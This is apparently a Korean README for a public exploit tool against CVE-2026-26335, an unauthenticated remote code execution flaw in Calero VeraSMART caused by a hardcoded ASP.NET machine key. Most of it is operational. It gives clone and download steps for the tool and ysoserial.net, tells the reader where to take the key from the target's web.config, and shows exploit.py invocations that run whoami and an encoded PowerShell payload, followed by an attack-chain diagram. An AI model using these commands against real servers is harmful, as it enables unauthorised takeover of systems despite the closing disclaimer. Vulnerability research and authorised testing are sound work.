
CVE-2026-26335 자동 익스플로잇으로, 정적 머신 키를 사용해 위조된 ASP.NET ViewState를 통해 Calero VeraSMART에서 발생하는 인증 없는 원격 코드 실행(RCE) 취약점입니다. 엔드포인트 탐색, 페이로드 생성, 명령 실행 기능을 포함합니다.
Mohammed Idrees Banyamer 보안 연구원
CVE‑2026‑26335은 Calero VeraSMART(2022 R1 이전 버전)의 심각한 인증 없는 원격 코드 실행 취약점입니다.
이 애플리케이션은 설치 환경 전체에서 공유되는 정적 하드코딩된 ASP.NET 머신 키를 사용합니다.
이 키를 확보한 공격자는 악의적인 ASP.NET ViewState를 위조하고 서버 측 역직렬화 → RCE를 트리거할 수 있습니다.
이 익스플로잇은 다음을 자동화합니다:
__VIEWSTATEGENERATOR 추출CWE‑321 — 하드코딩된 암호화 키
VeraSMART 배포 환경은 동일한 ASP.NET machineKey를 재사용합니다:
<machineKey validationKey="STATIC_KEY"
decryptionKey="STATIC_KEY"
validation="SHA1"
decryption="AES" />
한 설치 환경에서 키를 확보한 공격자는 모든 환경을 공격할 수 있습니다.
git clone https://github.com/mbanyamer/CVE-2026-26335-VeraSMART-RCE.git
cd CVE-2026-26335-VeraSMART-RCE
wget https://github.com/pwntester/ysoserial.net/releases/latest/download/ysoserial.exe
키는 공개되지 않습니다. 대상에서 획득해야 합니다:
C:\Program Files (x86)\Veramark\VeraSMART\WebRoot\web.config
또는 동반 파일 읽기 취약점을 통해:
CVE‑2026‑26333
python3 exploit.py -t https://target-ip -vk VALIDATION_KEY -dk DECRYPTION_KEY --check-only -v
python3 exploit.py -t https://target-ip -vk VALIDATION_KEY -dk DECRYPTION_KEY -c "whoami"
python3 exploit.py -t https://target-ip -vk KEY -dk KEY -e /Login.aspx -c "powershell -enc ZQBjAGgAbwAgAEgAYQBjAGsAZQBkAA=="
python3 exploit.py -t https://target-ip -vk KEY -dk KEY --proxy http://127.0.0.1:8080 -v
9.8 — 치명적(Critical) AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
VeraSMART 2022 R1에서 수정됨:
임시 대응 방안:
교육 및 승인된 테스트 목적으로만 사용하십시오. 소유하거나 평가 권한이 있는 시스템에서만 사용하십시오.
Mohammed Idrees Banyamer 보안 연구원
다음 다이어그램은 Calero VeraSMART에서 CVE‑2026‑26335의 공격 체인을 보여줍니다. 정적 ASP.NET 머신 키를 통해 악의적인 ViewState를 위조하여 원격 코드 실행으로 이어지는 과정입니다.
flowchart LR
A[Attacker] --> B[Obtain VeraSMART machineKey]
B --> C[Discover ViewState endpoint]
C --> D[Extract __VIEWSTATEGENERATOR]
D --> E[Generate malicious ViewState via ysoserial]
E --> F[Sign payload with machineKey]
F --> G[Send forged POST request]
G --> H[ASP.NET ViewState deserialization]
H --> I[TypeConfuseDelegate gadget]
I --> J[Remote Code Execution on IIS]